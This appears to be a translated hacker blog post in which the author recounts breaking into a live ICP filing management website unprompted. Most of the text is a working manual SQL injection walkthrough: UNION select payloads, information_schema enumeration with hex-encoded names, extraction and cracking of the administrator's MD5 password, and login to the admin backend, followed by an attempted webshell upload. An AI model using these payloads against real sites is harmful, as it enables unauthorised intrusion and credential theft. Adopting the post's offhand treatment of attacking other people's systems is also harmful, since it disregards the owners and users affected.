Author: viekst
Today, while visiting a friend's website, I ended up on an ICP filing management system. I was bored, so I took a look at it.
I opened a page: http://*****.*****.com/hunet.com/show_news.php?id=15
Out of habit I appended a single quote: error.
Then I appended and 1=1 and and 1=2, which returned the normal page and a blank page respectively, so injection exists. I put it into the Ah D injection tool, but it could not find the table name.
So it had to be manual injection.
First, use order by to find the number of columns in the query (not the length of the table name: ORDER BY n errors as soon as n exceeds the column count).
http://***.***.com/show_news.php?id=7 order by 6 returns normally
http://***.***.com/show_news.php?id=7 order by 7 returns an error
So the query selects 6 columns.
http://***.***.com/show_news.php?id=7 and 1=2 union select 1,2,3,4,5,6 -- returns 3, 4, 5, meaning the third, fourth and fifth columns are echoed into the page.
http://***.***.com/show_news.php?id=7 and 1=2 union select 1,2,user(),4,5,6 -- returns fig@localhost
Replacing user() with database() and version() gives the database name hutong (the hex literal 0x6875746F6E67 used below encodes exactly that string) and the MySQL version 5.0.51a-community-nt.
MySQL has supported UNION queries since 4.0, and 5.0 added the information_schema virtual database, so we can query it to find the administrator table and its columns,
and then read the administrator account and password with a UNION query.
We know the current database is hutong. The table_schema comparison needs that name as a string, and to avoid quote characters (which the target may filter or escape) it is written as a MySQL hex literal, 0x6875746F6E67.
http://***.***.com/show_news.php?id=7 and 1=2 union select 1,2,table_name,4,5,6 from information_schema.tables where table_schema=0x6875746F6E67 -- returns ba_admin_action
That is not the administrator table. Add a limit clause to step through the results one row at a time.
http://***.***.com/show_news.php?id=7 and 1=2 union select 1,2,table_name,4,5,6 from information_schema.tables where table_schema=0x6875746F6E67 limit 3,1 -- returns ba_admin_user, which is the administrator table.
Now query the columns of ba_admin_user; again the table name is passed as a hex literal, 0x62615F61646D696E5F75736572.
http://***.***.com/show_news.php?id=7 and 1=2 union select 1,2,column_name,4,5,6 from information_schema.columns where table_name=0x62615F61646D696E5F75736572 limit 0,1 -- returns user_id
http://***.***.com/show_news.php?id=7 and 1=2 union select 1,2,column_name,4,5,6 from information_schema.columns where table_name=0x62615F61646D696E5F75736572 limit 1,1 -- returns user_name
http://***.***.com/show_news.php?id=7 and 1=2 union select 1,2,column_name,4,5,6 from information_schema.columns where table_name=0x62615F61646D696E5F75736572 limit 3,1 -- returns password
With the administrator table and its columns known, one UNION query reads the administrator account and password through the two echoed columns:
http://***.***.com/show_news.php?id=7 and 1=2 union select 1,2,user_name,password,5,6 from ba_admin_user --
The password was an MD5 hash; it cracked successfully and I logged into the admin backend.
I tried to get a webshell, but the platform mainly edits and reviews the ICP filing records of some domain names, and there was nothing else usable.
Although eWebEditor was used to publish news, it had been removed from the backend and several of its pages were deleted, so no image files could be uploaded and I had to give up. Still, you can do a lot from the backend, right?